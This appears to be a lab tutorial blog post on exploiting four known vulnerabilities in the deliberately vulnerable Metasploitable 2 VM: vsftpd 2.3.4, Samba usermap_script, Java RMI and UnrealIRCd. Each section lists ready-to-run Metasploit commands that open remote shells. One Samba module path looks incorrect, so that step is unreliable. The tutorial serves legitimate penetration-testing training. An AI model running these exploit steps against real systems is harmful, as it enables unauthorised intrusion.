July 7, 2026
Exploiting Common Vulnerabilities in Metasploitable 2
In this section, we demonstrate several well-known vulnerabilities included in Metasploitable 2. These exploits are performed only within…
By Aneesh Kv
2 min read
In this section, we demonstrate several well-known vulnerabilities included in Metasploitable 2. These exploits are performed only within an isolated lab environment for educational purposes.
- Exploiting the VSFTPD 2.3.4 Backdoor (CVE-2011–2523)
vsftpd 2.3.4 (Very Secure FTP Daemon) was a popular Linux FTP server. In 2011, the official download package was compromised and replaced with a malicious version containing a hidden backdoor. When triggered, it opened port 6200, allowing attackers to gain shell access without normal authentication. This vulnerability is identified as CVE-2011–2523.
Command: search vsftpd 2.3.4
Command: use exploit/unix/ftp/vsftpd_234_backdoor
Command: info
Command: show options
Command: set LHOST 192.168.1.14
Command: set RHOSTS 192.168.1.5
Command: run
2. Exploiting the Samba Username Map Script Vulnerability (CVE-2007–2447)
Samba versions 3.0.20–3.0.25rc3 contain a command execution vulnerability when the username map script option is enabled. An attacker can send a specially crafted username containing shell characters to execute commands on the target system. No authentication is required because the username is processed before login. This vulnerability is identified as CVE-2007–2447.
Command: search samba
Command: use exploit/multi/handler/samba/usermap_script
Command: info
Command: show options
Command: set RHOSTS 192.168.1.5
Command: run
3. Exploiting the Java RMI Service (CVE-2011–3556)
Java RMI (grmiregistry) allows Java programs to communicate over a network. In older or insecurely configured Java RMI services (such as those affected by CVE-2011–3556), attackers can exploit insecure remote class loading or related RMI weaknesses to achieve remote code execution. In Metasploitable 2, the Java RMI service is intentionally vulnerable, allowing learners to safely practice identifying and exploiting this weakness in a controlled lab environment
Command: search java_rmi_server
Command: use multi/misc/java_rmi_Server
Command: info
Command: show options
Command: set RHOSTS 192.168.1.5
Command: set LHOST 192.168.1.14
Command: run
4. Exploiting the UnrealIRCd Backdoor (CVE-2010–2075)
UnrealIRCd is an Internet Relay Chat (IRC) server used for real-time messaging. UnrealIRCd 3.2.8.1 became vulnerable when a malicious backdoor was inserted into its official download archive between November 2009 and June 12, 2010. Systems that installed the compromised version allowed attackers to execute remote commands, making it a well-known software supply chain attack. In Metasploitable 2, this vulnerable version is included for safe exploitation practice in a controlled lab environment.
Command: search UnrealIRCD
Command: use exploit/unix/unreal_ircd_3281_backdoor
Command: info
Command: show options
Command: set RHOSTS 192.168.1.5
Command: set LHOST 192.168.1.14
Command: run
Conclusion
Practicing with Metasploitable 2 provides valuable hands-on experience in identifying and validating common vulnerabilities in a controlled lab environment. It helps build practical penetration testing skills while emphasizing the importance of patch management, secure configurations, and keeping production systems up to date to reduce security risks.